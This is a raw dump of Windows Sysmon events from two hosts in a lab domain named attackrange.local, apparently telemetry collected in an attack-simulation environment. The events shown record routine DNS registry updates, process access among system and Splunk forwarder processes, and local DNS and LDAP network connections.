07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\FlagsDWORD (0x00000002) 13241300x8000000000000000104593Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\TtlDWORD (0x000004b0) 13241300x8000000000000000104592Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\SentPriUpdateToIpBinary Data 13241300x8000000000000000104591Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\SentUpdateToIpBinary Data 13241300x8000000000000000104590Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\DnsServersBinary Data 13241300x8000000000000000104589Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\HostAddrsBinary Data 13241300x8000000000000000104588Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\PrimaryDomainNameattackrange.local 13241300x8000000000000000104587Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\AdapterDomainName(Empty) 13241300x8000000000000000104586Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\Hostnamewin-dc-639 10341000x8000000000000000104585Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.074{58E9C193-ACA5-615A-0B00-00000000FC01}628672C:\Windows\system32\lsass.exe{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30485|C:\Windows\system32\lsasrv.dll+2e31b|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x8000000000000000104584Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\RegisteredSinceBootDWORD (0x00000001) 354300x800000000000000082480Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.608{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50098-false10.0.1.12-8000- 23542300x800000000000000082479Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.383{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1C52F9FFF0339C701711A105BF3B1FE,SHA256=1D985114E75157878BE270120B956B403DA201B99CF0347671D8502365AC1DB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104614Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:35.965{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1864382D6F1B87F11FD62D6F9F9170E,SHA256=A94F772B54F9AAF496E1824E23BC2F306BDBAADEA75FD40691DBECBDA9CC3891,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082511Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.867{2FDD8D40-B3B3-615A-7001-00000000FD01}31523184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082510Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.648{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=598E1E41D9FF93B006B27DC75D107F07,SHA256=75463ECE32BF59103CFEC500654AC0EF74E7CAAF184D9B931304A86B278CB229,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082509Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3B3-615A-7001-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082508Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082507Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082506Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082505Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082504Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082503Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082502Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082501Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082500Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082499Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3B3-615A-7001-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082498Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.617{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3B3-615A-7001-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082497Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.618{2FDD8D40-B3B3-615A-7001-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082496Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:35.602{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F075074786D787293CB89B173AD700A,SHA256=CE262B7819DF20FFA99CF8AE20A19017E07068429676E13CF81C6C203C15E641,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104613Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.326{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local60949- 354300x8000000000000000104612Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.325{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local50790- 354300x8000000000000000104611Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.324{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58035- 354300x8000000000000000104610Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.324{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60009- 354300x8000000000000000104609Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.319{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51708-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104608Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.319{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51708-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104607Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.318{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local59212- 354300x8000000000000000104606Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.316{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-639.attackrange.local51707-false10.0.1.14win-dc-639.attackrange.local53domain 354300x8000000000000000104605Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.316{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-639.attackrange.local51707-false10.0.1.14win-dc-639.attackrange.local53domain 354300x8000000000000000104604Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.314{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local58963- 354300x8000000000000000104603Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.314{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-639.attackrange.local58963-false10.0.1.14win-dc-639.attackrange.local53domain 354300x8000000000000000104602Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.530{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63997- 23542300x8000000000000000104601Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:35.074{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6D2345F99E7FADE5F273CBD2EB13C0E,SHA256=873B706F8BD05E9639A2A7DC2330CE3F5FF2D4C21C27E553B8C4A724C3442553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104616Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:36.980{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94645C13412C561B01EE5028758F98F1,SHA256=3FD2DB77CC7097F99B45C1917AF67198E8BB339B9EFBB4E8CD496A48EB93D1D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082526Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.915{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82FB5207843C4AED157D78962E71EC8F,SHA256=7F84A14947A8E7EDDA362CDD0ED8A8CC9F78D39AE9700B7108F0F303F2060C35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082525Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 